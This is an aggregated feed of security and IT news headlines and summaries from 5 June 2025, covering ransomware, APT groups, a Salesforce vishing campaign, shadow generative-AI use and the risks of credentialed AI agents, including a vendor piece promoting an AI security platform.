“Our national security depends on a resilient and secure energy grid,” said Sen. John Hickenlooper, D-Colo. Experts say the new effort would be welcomed by the private sector.

https://www.cybersecuritydive.com/news/bipartisan-legislation-proposes-cyber-threat-analysis-program-energy-sector/749923/
Finding Balance in US AI Regulation
2025-06-05T14:00:00Z | 1749132000

The US can't afford to wait for political consensus to catch up to technological change.

https://www.darkreading.com/vulnerabilities-threats/finding-balance-us-ai-regulation
#Infosec2025: Threat Actors Weaponizing Hardware Devices to Exploit Fortified Environments
2025-06-05T14:00:00Z | 1749132000

Sophisticated nation-state and cybercriminal groups are using insiders to infect targets via hardware devices, despite a lack of reporting of this threat

https://www.infosecurity-magazine.com/news/threat-actors-weaponizing-hardware/
Ensure PCI 4.0 Readiness with File Integrity Monitoring for Containers
2025-06-05T14:00:00Z | 1749132000

Compliance isn’t optional. But it’s never been more complex. The rise of containers has revolutionized modern infrastructure—enabling faster innovation and greater scalability. But with this transformation comes a new wave of compliance challenges. PCI DSS 4.0 introduces stricter requirements for both vulnerability management and file integrity monitoring (FIM) in dynamic environments like Kubernetes and containerized […]

https://blog.qualys.com/category/product-tech
Autonomous and credentialed: AI agents are the next cloud risk
2025-06-05T13:58:46Z | 1749131926

In April, Anthropic’s CISO made an eye-opening prediction: within the next year, AI-powered virtual employees with corporate credentials will begin operating across the enterprise. These agents won’t just support workflows — they’ll become part of the workforce. The business case is obvious: AI agents promise scalable automation, reduced overhead, and tireless productivity. Salesforce is already making this a reality, recently introducing AI “digital teammates.” AI agent deployments are expected to grow 327% during the next two years, but from the vantage point of cybersecurity, this evolution introduces a volatile mix of innovation and risk. We’re not just giving software system access — we’re giving identity, autonomy, and decision-making capabilities. That changes how organizations approach security entirely. Autonomous, credentialed, and vulnerable Let’s be clear: These AI agents are not tools in the traditional sense. Unlike conventional automation or service accounts, these agents act as authenticated users operating under corporate credentials, making decisions, interacting with systems and data, and in some cases, executing sensitive tasks. That means they will have the same access and arguably pose the same risks as a human employee. But unlike humans, AI agents don’t understand context, intent, or consequences the way we do. They can be tricked, manipulated, or coerced through techniques like prompt injection or adversarial inputs. We’ve long accepted that humans are the weakest link in security—phishing and social-engineering schemes prey on our psychology—but AI agents introduce an even softer target: They take things at face value, don’t call the help desk, and operate at machine speed. Once compromised, they could serve as a persistent, high-bandwidth attack surface buried deep inside an organization’s environment. Rethinking security in the AI age Traditional security tools have been designed around human behavior: logins, passwords, and access/privilege levels. AI employees break these assumptions. Non-human identities, which already far outnumber human users, are becoming the dominant force in cloud environments. As cloud investments continue to skyrocket, citing AI as the top driver, and more AI agents are deployed in the cloud, organizations must turn towards a new age of AI security tools that can properly secure all that AI has to offer, specifically questions around: What level of autonomy and authority will AI agents have inside the enterprise? How do you monitor privilege activity and detect deviations? Can these agents be exploited or jailbroken via prompt injection or adversarial inputs? What data are these agents being trained on? The next insider threat AI introduces new, unproven components to your application stack – infrastructure, models, datasets, tools and plugins. And now, AI innovation is accelerating even faster with the introduction of agents. Unlike LLMs, agents reason, act autonomously, and coordinate with other agents. AI agents will have continuous access, won’t sleep or take vacations, and can be deployed at scale across multiple departments. This is bringing new complexity to organizations’ environments and introduces new security risks. One compromised agent could potentially do more damage in minutes than a malicious insider might accomplish in months. AI employees may soon rival, or exceed, insiders as the most dangerous threat vector. OWASP recently published its Agentic AI Threats and Mitigation highlighting emerging threats such as prompt injection, tool misuse, identity spoofing and more. Even more so, recent research from Unit 42 found prompt injection remains one of the most potent and versatile attack vectors, capable of leaking data, misusing tools, or subverting agent behavior. We’ve spent years building defenses around the human element. Now we must turn that same, or even fiercer, rigor toward the machines acting in our name. Taking action Palo Alto Networks recently introduced Prisma AI Runtime Security (AIRS) designed to help organizations discover, assess, and protect every AI app, model, dataset, and agent in their environment. With Prisma AIRS, organizations receive a comprehensive platform that provides: AI Model Scanning – Safely adopt AI models by scanning them for vulnerabilities. Secure your AI ecosystem against risks, such as model tampering, malicious scripts, and deserialization attacks. AI-Security Posture Management – Gain insight into security posture risks associated with your AI ecosystem, such as excessive permissions, sensitive data exposure, platform misconfigurations, access misconfigurations, and more. AI Red Teaming – Uncover potential exposure and lurking risks before bad actors do. Perform automated penetration tests on your AI apps and models using our Red Teaming agent that stress tests your AI deployments, learning and adapting like a real attacker. Runtime Security – Protect LLM-powered AI apps, models, and data against runtime threats, such as prompt injection, malicious code, toxic content, sensitive data leak, resource overload, hallucination, and more. AI Agent Security – Secure agents (including those built on no-code/low-code platforms) against new agentic threats, such as identity impersonation, memory manipulation, and tool misuse. As AI reshapes how enterprises operate and how attacks unfold, Prisma AIRS moves just as fast. Enterprises can confidently embrace the future of AI with Prisma AIRS. Read here how Palo Alto Networks Prisma AIRS, the world’s most comprehensive AI security platform is helping organizations secure all AI apps, agents, models and data.

https://www.cio.com/article/4002517/autonomous-and-credentialed-ai-agents-are-the-next-cloud-risk.html
CC-4664 - Cisco Releases Security Advisory Affecting Cisco Identity Service Engine
2025-06-05T13:55:00Z | 1749131700

Severity: Medium Advisory addresses a critical severity vulnerability in Cisco Identity Service Engine which could be exploited to allow a remote attacker to achieve high-level access Advisory addresses a critical severity vulnerability in Cisco Identity Service Engine Updated: 05 Jun 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4664
Researchers Detail Bitter APT’s Evolving Tactics as Its Geographic Scope Expands
2025-06-05T13:53:00Z | 1749131580

The threat actor known as Bitter has been assessed to be a state-backed hacking group that's tasked with gathering intelligence that aligns with the interests of the Indian government. That's according to new findings jointly published by Proofpoint and Threatray in an exhaustive two-part analysis. "Their diverse toolset shows consistent coding patterns across malware families, particularly in...

https://thehackernews.com/2025/06/bitter-hacker-group-expands-cyber.html
Don’t Settle for Mediocre Frontend Testing: Build Stable, Reliable Systems Instead
2025-06-05T13:51:24Z | 1749131484

You’re moments away from finishing a feature you’ve been working on for the last two weeks when you get a Slack notification that the frontend test pipeline has failed for the 824th time that year.  It’s the same handful of flaky tests that fail whenever there’s a half-moon. You make a note to fix these tests and get back to finishing that feature. We were in this situation and asked ourselves whether we enjoyed building and maintaining our frontend test system. The answer was no, so we tore it down and built something we could be proud of. Getting your frontend testing infrastructure stable is tough. Timing is tricky to get right when your tests are at the whim of network requests and browser rendering cycles. However, with the right tools and a solid foundation, you can do it, and it’s worth the effort. A promising testing pipeline isn’t just about catching issues; it’s a force multiplier for your development team, empowering them to move faster, confidently, and focus on doing their best work. In this post, we walk through why we switched from Cypress to Playwright, how we made the switch, and what the outcomes have been. What was […]

https://blog.thinkst.com/2025/06/dont-settle-for-mediocre-frontend-testing-build-stable-reliable-systems-instead.html
Anthropic unveils custom AI models for US national security customers
2025-06-05T13:31:06Z | 1749130266

Anthropic says it has released a new set of AI models tailored for U.S. national security customers. The new models, a custom set of “Claude Gov” models, were “built based on direct feedback from our government customers to address real-world operational needs,” writes Anthropic in the blog post. Compared to Anthropic’s consumer- and enterprise-focused models, […]

https://techcrunch.com/2025/06/05/anthropic-unveils-custom-ai-models-for-u-s-national-security-customers/
Backdoored Open Source Malware Repositories Target Novice Cybercriminals
2025-06-05T13:31:01Z | 1749130261

A threat actor has been creating backdoored open source malware repositories to target novice cybercriminals and game cheaters. The post Backdoored Open Source Malware Repositories Target Novice Cybercriminals appeared first on SecurityWeek.

https://www.securityweek.com/backdoored-open-source-malware-repositories-target-novice-cybercriminals/
Rep. Garbarino: Ending CISA mobile app security program for feds sends ‘wrong signal’
2025-06-05T13:30:00Z | 1749130200

CyberScoop is first to report on the letter to DHS from the chair of a cybersecurity subcommittee, which also addresses CISA’s role as lead coordinator with the telecom sector. The post Rep. Garbarino: Ending CISA mobile app security program for feds sends ‘wrong signal’ appeared first on CyberScoop.

https://cyberscoop.com/rep-garbarino-ending-cisa-mobile-app-security-program-for-feds-sends-wrong-signal/
Rep. Garbarino: Ending CISA mobile app security program for feds sends ‘wrong signal’
2025-06-05T13:30:00Z | 1749130200

CyberScoop is first to report on the letter to DHS from the chair of a cybersecurity subcommittee, which also addresses CISA’s role as lead coordinator with the telecom sector. The post Rep. Garbarino: Ending CISA mobile app security program for feds sends ‘wrong signal’ appeared first on CyberScoop.

https://cyberscoop.com/rep-garbarino-ending-cisa-mobile-app-security-program-for-feds-sends-wrong-signal/
#Infosec2025: Defenders and Attackers are Locked in an AI Arms Race
2025-06-05T13:15:00Z | 1749129300

Malicious actors are making more use of AI in attacks, even as governments look to boost AI investments

https://www.infosecurity-magazine.com/news/infosec2025-arms-race-ai/
Mai küberruumis: mõjuga intsidentide kasv, sagenenud petukõned ja libapoed
2025-06-05T13:10:24Z | 1749129024

Mais registreeris Riigi Infosüsteemi Amet (RIA) 1107 mõjuga intsidenti, mis ületas viimase kuue kuu keskmist. Peamiselt kasutajaandmete varastamiseks mõeldud õngitsuslehti avastati märtsis 336 ja erinevaid petulehti 371.

https://ria.ee/uudised/mai-kuberruumis-mojuga-intsidentide-kasv-sagenenud-petukoned-ja-libapoed
GenAI's Impact — Surging Adoption and Rising Risks in 2025
2025-06-05T13:05:39Z | 1749128739

Explore how GenAI is reshaping enterprise operations and how to mitigate rising risks. The post GenAI's Impact — Surging Adoption and Rising Risks in 2025 appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/06/genais-impact-surging-adoption-rising-risks/
CISOs beware: genAI use is outpacing security controls
2025-06-05T13:05:00Z | 1749128700

Employees in every organization use an average of 6.6 high-risk generative AI applications – including some unknown to CISOs — says Palo Alto Networks in a new study. But, an expert says, that estimate is low. “I think it’s probably worse,” said Joseph Steinberg, a cybersecurity and AI expert. “In a major company it’s got to be higher than that.” In fact, he predicts the number of risky AI apps in the enterprise is only going to grow. That means that CISOs need to do a risk assessment of every genAI app employees are using, he said in an interview, and then set policies and procedures staff have to follow. He warned CISOs and CEOs against following ‘the Ostrich algorithm’ – pretending the danger doesn’t exist by ignoring, if not rewarding, the shadow use of AI by employees, either in the office or at home. “There’s no question there’s a tremendous amount of use of generative AI apps being used in ways that are highly problematic for the organization,” he said. “Remember, I can use a genAI app from my personal computer that my company has no control over, and still leak a tremendous amount of data just from what I’m asking – and it may not be only what I’m asking, but what others are also asking, and the generative AI learns from the pattern of questions. “It’s hard to block that, because the risk can’t be completely controlled by the organization, because someone can do it on their own time from their own machine.” And organizations sometimes deliberately or inadvertently reward employees for using unapproved genAI apps, he added, for example, by applauding a report that’s just too good. “Let’s be honest,” he said. “Many of the companies that ban generative AI are rewarding their employees [for using it]. They’ll never admit it. But if you’re getting reviewed based on your performance, and your performance is enhanced by using shadow IT or AI on your own machine on your own time, if you’re not being punished, you’re not going to stop.” Steinberg was commenting on a study released Thursday by Palo Alto Networks (PAN) on the popularity of genAI in organizations. It analyzed traffic logs from just over 7,000 PAN customers during the 12 months of 2024 to detect use of software-as-a-service apps such as ChatGPT, Microsoft Copilot, Amazon Bedrock and more. It also included a separate look at anonymized data from its customers’ loss prevention incidents from the first three months of this year. It observed: on average, most organizations will see a total of 66 genAI apps in their environments. The bulk of those among PAN customers were “writing assistants” (34% of the sample. The biggest in this category was Grammarly); “conversational agents” (just under 29%, apps such as Microsoft Copilot, ChatGPT and Google Gemini); “enterprise search” apps  (just over 10% of the sample) and “developer platform” apps (just over 10%). These four alone make up 84% of the genAI apps seen; 10% of genAI apps are called ‘high-risk’ because, according to customer telemetry, access to them was restricted or blocked by customers at some point or points during the study period; data loss prevention (DLP) incidents for genAI detected by PAN more than doubled this year compared to 2024. Writing assistants aren’t applications to be taken lightly, the report warns. “If an AI writing assistant is integrated into an organization’s systems without proper security controls, it could become a vector for cyberattacks. Hackers could exploit weaknesses in the genAI app to gain access to internal systems or sensitive data.” “As genAI adoption grows, so do its risks,” it says. “Without visibility into genAI apps, and their broader AI ecosystems, businesses can risk exposing sensitive data, violating regulations, and losing control of intellectual property. Monitoring AI interactions is no longer optional. It’s critical for helping prevent shadow AI adoption, enforcing security policies, and enabling responsible AI use.” The report identifies these genAI security best practices for CISOs: understand genAI usage and control in the enterprise and what is allowed. Implement conditional access management to limit access to genAI platforms, apps, and plugins based on users and/or groups, location, application risk, compliant devices, and legitimate business rationale; guard sensitive data from unauthorized access and leakage through real-time content inspection with centralized policy enforcement across the infrastructure and within data security workflows to help prevent unauthorized access and sensitive data leakage; defend against modern AI-based cyberthreats through a zero trust security framework to identify and block highly sophisticated, evasive, and stealthy malware and threats within genAI responses.

https://www.csoonline.com/article/4002103/cisos-beware-genai-use-is-outpacing-security-controls.html
FBI Alert: Extortion Gang Targets Law Firms With Social Engineering Attacks
2025-06-05T13:03:54Z | 1749128634

The FBI is warning that the Silent Ransom Group (SRG) is targeting law firms with IT-themed social engineering attacks and callback phishing emails.

https://blog.knowbe4.com/extortion-gang-targets-law-firms-with-social-engineering-attacks
Copyright-Themed Phishing Lures Target Europe
2025-06-05T13:03:36Z | 1749128616

A phishing campaign is targeting European countries with lures themed around copyright infringement, researchers at Cybereason warn.

https://blog.knowbe4.com/copyright-themed-phishing-lures-target-europe
How AI is helping PwC clients comply with European Union sustainability regulations
2025-06-05T13:00:00Z | 1749128400

The need to combat global warming is leading to stricter governmental regulations and increased consumer demand for businesses to adopt environmentally friendly strategies and deliver sustainable products. That’s especially true in Europe. What does that mean for your company? If you’re planning to do business anywhere in the European Union (EU), you may have to deal with the Corporate Sustainability Reporting Directive (CSRD) and associated European Sustainability Reporting Standards (ESRS). Those regulations require certain companies with a presence in the EU to report their impact on the environment and society with the goal of having companies provide a positive contribution to the natural world and human systems. “I can see the potential environmental and financial benefits of people wanting to work with, support, and invest in a company dedicated to sustainability,” you say. Then, you look at what is required to comply: Environmental, Social, and Governance (ESG) reporting along your entire value chain. The process can be complex, resource-intensive, and time-consuming. It can require numerous mandatory disclosures, thousands of data points to collect and interpret, and key performance indicators (KPIs) to calculate. You take a deep breath and sigh – knowing those tasks will have to be done manually in your organization with limited resources, which can slow down reporting, increase errors, and raise compliance risks. CSRD.AI Manager to the rescue PricewaterhouseCoopers GmbH WPG Germany (PwC Germany), part of the PwC global professional services network, faced the same process challenge. In response, the organization developed a solution in partnership with SAP that’s also available to clients as well. The solution is called CSRD.AI Manager. Recipient of an SAP Innovation Award for 2025, CSRD.AI Manager employs automation in the form of artificial intelligence (AI) to make the reporting process easier, faster, and more accurate. “As with other organizations, we faced difficulties in interpreting thousands of data points and integrating diverse data sources, leading to inefficiencies,” observes Nico Reichen, a partner with PwC Germany. “The situation not only impacted our operational productivity but also affected workforce morale due to the manual tasks. We needed a streamlined, automated solution.” Creating an automatic winner with CSRD expertise and AI technology To develop the solution for its network and clients, PwC Germany turned to SAP, collaborating closely with the organization’s CSRD expert team and SAP Cloud’s technical development specialists. “The CSRD.AI Manager is an impressive example of how the collaboration between SAP and PwC can create a product that helps clients solve complex problems by adopting advanced technology such as AI,” Reichen notes. “In fact, artificial intelligence is the key component of our solution.” CSRD.AI Manager utilizes SAP AI Core components, as well as the Vector Engine from SAP HANA Cloud for text and embedding generation to automate report generation. SAP Datasphere, SAP Business Technology Platform (BTP), SAP Build Apps and SAP Analytics Cloud are also leveraged for AI-supported data collection and modeling and report visualization. It also integrates the PwC Germany CSRD-specific content with customizable data models to meet evolving compliance requirements. Taking the “sigh” out of ESG reporting All that expertise and technology adds up to a solution for successfully automating data collection, KPI calculations, and report generation, producing a variety of business, IT, and user benefits. CSRD.AI Manager: Enables comprehensive ESG reporting, supporting companies in meeting CSRD compliance requirements and promoting sustainable practices Improves efficiency with an automated, cloud-based solution that reduces data processing time and effort as well as the need for complex hardware infrastructure Automates many manual tasks, reducing errors and freeing employees to focus on strategic activities, while potentially lowering costs. Guarantees a seamless, compliant reporting process, enhancing client trust and satisfaction. Utilizes direct integration of the latest AI functionalities directly into existing IT systems AI-supported data collection automatically provides information on relevant data to answer regulatory questions in a targeted manner. Automated report generation uses extensive KPIs and data points to create an AI-supported report that provides the basis for compliant reporting. Enhances data security and integrity across the entire organization “CSRD compliance used to be a major drain on clients’ resources. But CSRD.AI Manager completely changed the game, automating the heavy lifting and freeing clients’ teams to focus on real sustainability improvements,” announces Benjamin Lösken, Director at PwC and Product Owner of the ESG, Reporting Manager – CSRD. A paragon of innovation In an era of increasing compliance demands, the CSRD.AI Manager provides an AI-driven long-term solution that ensures efficient, reliable, and audit-ready ESG reporting. For that achievement, PwC Germany was selected as the Winner of  the Partner Paragon award at the recent SAP Innovation Awards 2025 ceremony. The honor is given to partners who’ve developed a next-generation application deployed by customers that uses SAP BTP and is licensed by the SAP Build or Tech adoption program. Check out PwC Germany’s pitch deck for more information on a solution for your business.

https://www.cio.com/article/4002031/how-ai-is-helping-pwc-clients-comply-with-european-union-sustainability-regulations.html
CERT-SE:s veckobrev v.23
2025-06-05T13:00:00Z | 1749128400

Ett peppar, peppar något lugnare nyhetsflöde denna kortvecka men som oftast ett gäng matnyttiga fördjupningar att förkovra sig i.

https://www.cert.se/2025/06/cert-se-veckobrev-v23.html
Navigating the Future of Scope 2: Balancing Impact and Practicality
2025-06-05T13:00:00Z | 1749128400

The Greenhouse Gas Protocol?s Scope 2 revisions demand thoughtful action. Read how we?re prioritizing meaningful, measurable impact over rapid progress.

https://www.akamai.com/blog/sustainability/2025/jun/navigating-future-scope-2-balancing-impact-practicality
Fog Computing vs. Edge Computing: Their Roles in Modern Technology
2025-06-05T13:00:00Z | 1749128400

Fog computing vs. edge computing: Understand how they compare, their unique benefits, and which is best for your data processing needs in IoT and beyond.

https://www.akamai.com/blog/security/2025/jun/fog-computing-edge-computing-roles-modern-technology
Star Wars gets a step closer with new Space Force satellite jamming capabilities
2025-06-05T13:00:00Z | 1749128400

In a world where code can neutralize a threat before the first missile is even launched, Space Force is betting big on systems to keep the upper hand in space without ever leaving the ground.

https://www.nextgov.com/emerging-tech/2025/06/star-wars-gets-step-closer-new-space-force-satellite-jamming-capabilities/405810/
Retrospective Analysis: Your Secret Weapon Against Advanced Persistent Threats
2025-06-05T13:00:00Z | 1749128400

When your security tools trigger an alert, what happens next? For many security operations center (SOC) teams, the real work begins after the detection, in the investigation phase. You need to know not just that something happened, but what exactly happened and when, where, and how deeply the attack may have spread...

https://www.netscout.com/blog/retrospective-analysis-your-secret-weapon-against-advanced
Fog Computing vs. Edge Computing: Their Roles in Modern Technology
2025-06-05T13:00:00Z | 1749128400

Fog computing vs. edge computing: Understand how they compare, their unique benefits, and which is best for your data processing needs in IoT and beyond.

https://www.akamai.com/blog/edge/2025/jun/fog-computing-edge-computing-roles-modern-technology
UK tax authority reveals scammers stole £47 million
2025-06-05T12:59:09Z | 1749128349

Officials from His Majesty's Revenue & Customs, the U.K.'s tax authority, said criminals took over accounts to pilfer £47 million ($63 million) last year.

https://therecord.media/uk-hmrc-tax-authority-scammers-stole-47million-pounds
UK tax authority reveals scammers stole £47 million
2025-06-05T12:59:09Z | 1749128349

Officials from His Majesty's Revenue & Customs, the U.K.'s tax authority, said criminals took over accounts to pilfer £47 million ($63 million) last year.

https://therecord.media/uk-hmrc-tax-authority-scammers-stole-47million-pounds
Building Trust, Advancing Resilience: Commvault’s FY25 Sustainability Report
2025-06-05T12:59:00Z | 1749128340

Learn more about our commitment to business continuity, operational resilience, and environmental responsibility. The post Building Trust, Advancing Resilience: Commvault’s FY25 Sustainability Report appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/building-trust-advancing-resilience-commvaults-fy25-sustainability-report
Behind the cloud reset: What CIOs are learning from real world deployments
2025-06-05T12:56:43Z | 1749128203

The enterprise cloud narrative is undergoing a fundamental shift. After years of public cloud evangelism, IT leaders are orchestrating what Broadcom’s latest research aptly terms a “cloud reset”—a strategic recalibration that positions private cloud as tomorrow’s strategic imperative. The numbers tell a compelling story. According to Broadcom’s inaugural “Private Cloud Outlook 2025: The Cloud Reset” report, which surveyed 1,800 senior IT decision-makers globally, 93% of enterprises now balance a hybrid mix of private and public cloud environments. More striking still, 69% are actively considering repatriating workloads to private cloud, with 35% having already executed this strategic shift. This isn’t cloud repatriation driven by the failure of public cloud migration—it’s optimization driven by the need for security, simplicity, and cost control. The security awakening Security concerns are propelling this transformation. The research reveals that 92% of enterprises trust private cloud for security and compliance, while 49% cite data privacy and security concerns as their primary worry about public cloud. These aren’t abstract fears. Data loss and leakage and data privacy and confidentiality remain the top security concerns in cloud computing, according to recent industry studies. Security-sensitive applications lead the repatriation trend, followed by data-intensive applications. What’s particularly noteworthy is that modern, cloud-native workloads are as likely to be repatriated as traditional applications, debunking the myth that only traditional applications return to private infrastructure. The cost reality check Financial predictability is the second pillar driving private cloud adoption. Broadcom’s research found that 94% of enterprises believe some of their public cloud spend is wasted, with nearly half (49%) estimating that more than a quarter of their public cloud expenditure delivers no value. Even more concerning, 31% believe waste exceeds 50% of their cloud budget. This cost unpredictability stems from the complexity inherent in public cloud pricing models and the unmanageability of hundreds of consumption meters.  As per the IDC blog, about half of cloud buyers spent more on cloud than they expected in 2023, with 59% predicting similar cost overruns during 2024. In contrast, 90% of organizations value the financial visibility and cost predictability that private cloud environments provide as per the Broadcom study. These statistics illustrate the beliefs–and realities–that are driving enterprises to private cloud. The strategic repositioning Enterprise cloud strategies are evolving beyond the binary public-versus-private debate toward intentional workload placement. Organizations are no longer asking “cloud or no cloud” but rather “which cloud for which workload.” This strategic maturity recognizes that different applications have different requirements for security, compliance, performance, and cost optimization. The data supports this shift toward intentionality. Fifty-three percent of enterprises plan to build new workloads in private cloud environments, indicating that private cloud isn’t just about repatriating existing applications—it’s about strategic future deployment decisions. The 84% of enterprises running both traditional and cloud-native applications in private cloud demonstrate that modern private infrastructure has achieved the agility and self-service capabilities that were once exclusive to public cloud platforms. The AI catalyst Generative AI is accelerating private cloud adoption. Organizations eager to harness AI capabilities face significant hurdles around data privacy and skill shortages. Private cloud environments offer the data residency, security controls, and governance frameworks necessary for enterprise AI deployment while maintaining compliance with increasingly stringent data protection regulations. Overcoming implementation challenges Success in this cloud reset requires organizations to address organizational challenges. IT teams must overcome traditional silos and skill gaps that have historically hindered private cloud deployments. Restructuring teams into platform level teams and enhancing in-house expertise are critical steps for realizing private cloud’s full potential. The path forward The cloud reset represents a maturation of enterprise IT strategy. Organizations are moving from cloud enthusiasm to cloud optimization, driven by real-world experience with security vulnerabilities, cost overruns, and compliance requirements. This shift doesn’t represent a rejection of public cloud but rather an embrace of strategic cloud deployment. The most successful organizations will be those that deploy workloads based on specific requirements rather than broad assumptions about cloud superiority. Private cloud has evolved far beyond its legacy reputation. Modern private cloud platforms offer the self-service capabilities, automation, and agility that enterprises demand while providing the security, compliance, and cost predictability that public cloud often cannot guarantee. The cloud reset is here. Organizations that recognize private cloud as a strategic asset will be best positioned to optimize their cloud investments for security, cost, and performance in an increasingly complex digital landscape. To learn more, visit us here. About the author: Pankaj Gupta is Senior Director of Private Cloud Solutions at VMware by Broadcom, where he helps customers unlock the full value of their private cloud investments. Previously, he led go to market initiatives across networking, security, and cloud portfolios at Cisco, Citrix and other leading technology firms.

https://www.cio.com/article/4001077/behind-the-cloud-reset-what-cios-are-learning-from-real-world-deployments.html
FBI: Play ransomware gang has attacked 600 organizations since 2023
2025-06-05T12:54:09Z | 1749128049

Law enforcement officials said initial access brokers with ties to Play ransomware operators continue to exploit multiple vulnerabilities in remote monitoring and management tool SimpleHelp.

https://therecord.media/play-ransomware-gang-fbi-update-900-attacks
FBI: Play ransomware gang has attacked 600 organizations since 2023
2025-06-05T12:54:09Z | 1749128049

Law enforcement officials said initial access brokers with ties to Play ransomware operators continue to exploit multiple vulnerabilities in remote monitoring and management tool SimpleHelp.

https://therecord.media/play-ransomware-gang-fbi-update-900-attacks
Hacker erbeuten Salesforce-Daten mit Vishing
2025-06-05T12:53:24Z | 1749128004

Salesforce-User in mehreren Branchen wurden Opfer einer gezielten Vishing-Attacke.JHVEPhoto – shutterstock.com Eine neue Welle von Cyberangriffen auf Salesforce-Kunden erfasst aktuell Unternehmen verschiedener Branchen, darunter Gastgewerbe, Einzelhandel und Bildungswesen. Die Google Threat Intelligence Group (GTIG) hat die Angreifer, die sich auf Voice-Phishing (Vishing) spezialisiert haben, als UNC6040 identifiziert. Modifizierte Salesforce-Tools als Einfallstor Berichten zufolge geben sich Vertreter der Gruppe am Telefon als IT-Support-Mitarbeitende aus und überreden die Opfer, eine modifizierte Version des Salesforce Data Loader zu installieren. Die manipulierte Version nutzt die OAuth-basierte Funktion „Connected Apps“ von Salesforce aus, um sich mit der Salesforce-Umgebung der Opfer zu verbinden. Indem die Opfer einen von den Angreifenden bereitgestellten Verbindungscode auf der Setup-Seite für verbundene Apps eingeben, erhalten die Kriminellen direkten Zugriff auf umfangreiche Datenbestände. Die modifizierte Data-Loader-App wird dabei häufig mit einem harmlos klingenden Namen wie „My Ticket Portal“ dargestellt. Ziel ist es, den IT-Support-Vorwand glaubwürdiger erscheinen zu lassen. Hierbei handelt es sich laut den Experten von Google um eine Form von gezielten Social-Engineering-Angriffen, die auf Nachlässigkeiten bei der Zugriffskontrolle und Schulung der Nutzer abzielen. Die Kriminellen hätten keine Schwachstelle von Salesforce ausgenutzt, so GTIG. Seitliche Bewegungen und Erpressungsversuche Sobald die Bande erfolgreich in die Salesforce-Instanzen eingedrungen ist, bewegt sie sich seitlich durch die IT-Infrastruktur der Opfer und greift weitere Cloud-Dienste an, darunter Okta und Microsoft 365. Dabei werden auch Phishing-Panels eingesetzt, um weitere Zugangsdaten und Multi-Faktor-Authentifizierungscodes zu erlangen. Die Experten von GTIG vermuten, dass UNC6040 eine Partnerschaft mit einem zweiten Bedrohungsakteur eingegangen ist, der den Zugang zu den gestohlenen Daten zu Geld macht. „Bislang haben wir noch keine Fälle gesehen, in denen UNC6040 während dieser Kampagne Ransomware eingesetzt hat“, so GTIG-Analyst Austin Larsen im Interview mit The Register. Ähnliche Methoden wie andere Hackergruppen Die gestohlenen Daten werden entweder direkt für Erpressungen genutzt oder an andere kriminelle Gruppen weiterverkauft. Erpressungsversuche treten teilweise erst Monate nach dem initialen Einbruch auf, was laut GTIG auf ein komplexes kriminelles Netzwerk hindeutet. UNC6040 behauptet von sich selbst, dass sie Kontakte zur Gruppe ShinyHunters hätten. Unabhängig von möglichen Partnerschaften setzt UNC6040 Taktiken und Techniken ein, die Ähnlichkeiten mit anderen bekannten Gruppen aufweisen wie Scattered Spiders hybride Vishing-Attacken im Jahr 2024, der Letscall-Malware-Kampagne in Südkorea und dem lose organisierten Kollektiv „The Com“. Dennoch handele es sich laut GTIG um eine eigenständige Gruppe, die sich durch ihre spezifischen Vorgehensweisen unterscheide. Empfehlungen und Schutzmaßnahmen Sowohl die Sicherheitsexperten als auch Salesforce empfehlen eine Reihe von Maßnahmen, um sich gegen diese Art von Angriffen zu schützen. Dazu gehören: Strikte Einhaltung des Prinzips der geringsten Privilegien bei Zugriffsrechten; Überwachung und Kontrolle von verbundenen Apps in Salesforce; Einsatz von IP-basierten Zugriffsbeschränkungen; Verpflichtende Multi-Faktor-Authentifizierung (MFA); Schulungen der Mitarbeiter im Umgang mit Social-Engineering-Angriffen, insbesondere Vishing.

https://www.csoonline.com/article/4002465/hacker-erbeuten-salesforce-daten-mit-vishing.html
Usaldusnimekirja formaadi muudatus: vajalik on uuendamine, et vältida digiallkirjade tõrkeid
2025-06-05T12:48:45Z | 1749127725

Usaldusnimekirja versiooni 5 uuenemine versiooni 6 vastu tähendab, et kõik infosüsteemid ja tarkvaralahendused, mis digiallkirju loovad või valideerivad, tuleb üle kontrollida, et veenduda kas uus formaat on toetatud ja vajadusel uuendada oma lahendusi.

https://ria.ee/uudised/usaldusnimekirja-formaadi-muudatus-vajalik-uuendamine-et-valtida-digiallkirjade-torkeid
Outdoor-Shop Unterwegs von Cyberattacke betroffen
2025-06-05T12:38:14Z | 1749127094

Der Händler für Outdoor-Ausrüstung Unterwegs wurde gehackt. Dabei sind möglicherweise Kundendaten abgeflossen.ORIONF – shutterstock.com Der Unterwegs Outdoor Shop wurde nach eigenen Angaben Ende Mai Ziel einer Cyberattacke. Wie aus einem Rundschreiben an die Kunden hervorgeht, konnten die Angreifer dabei potenziell Zugriff auf Kundendaten erlangen. „Aufgrund unserer Erkenntnisse aus den Untersuchungen des Vorfalls können wir leider nicht ausschließen, dass auch Kundendaten manipuliert und/oder kopiert wurden“, räumt das Unternehmen ein. Demnach sind sowohl Kunden des Onlineshops als auch der stationären Ladengeschäfte betroffen. Unterwegs betreibt deutschlandweit 24 Filialen. Dem Schreiben zufolge zählen zu den potenziell betroffenen Kundendaten: vollständige Namen, Liefer- und Rechnungsadressen, E-Mail-Adressen, Rufnummern und Anmeldedaten von registrierten Nutzern des Onlineshops. Bankdaten wurden demnach offenbar nicht abgegriffen. Sicherheitsmaßnahmen Der Outdoor-Spezialist warnt allerdings davor, dass die Daten für Phishing-Angriffe und andere betrügerische Aktivitäten im Netz eingesetzt werden könnten. Aus Sicherheitsgründen hat das Unternehmen die Passwörter für den unter unterwegs.biz erreichbaren Onlineshop zurückgesetzt. Zudem rät Unterwegs allen betroffenen Kunden, Vorsicht bei E-Mails oder Nachrichten walten zu lassen, die nach persönlichen Informationen oder Login-Daten fragen. Nach Angaben des Unternehmens wurden bereits alle zuständigen Behörden über den Vorfall informiert. Hintergründe des Angriffs noch nicht bekannt Weitere Informationen zu dem Angriff gibt es jedoch bisher nicht. Somit ist noch unklar, wie die Täter in die Systeme des Outdoor-Shops eindringen konnten. Auch hat sich scheinbar bislang keine Hackergruppe zu dem Angriff bekannt. Lesetipp: Diese Unternehmen hat es schon erwischt

https://www.csoonline.com/article/4002447/outdoor-shop-unterwegs-von-cyberattacke-betroffen.html
Controversial Firms Cellebrite and Corellium Announce $200 Million Acquisition Deal
2025-06-05T12:35:44Z | 1749126944

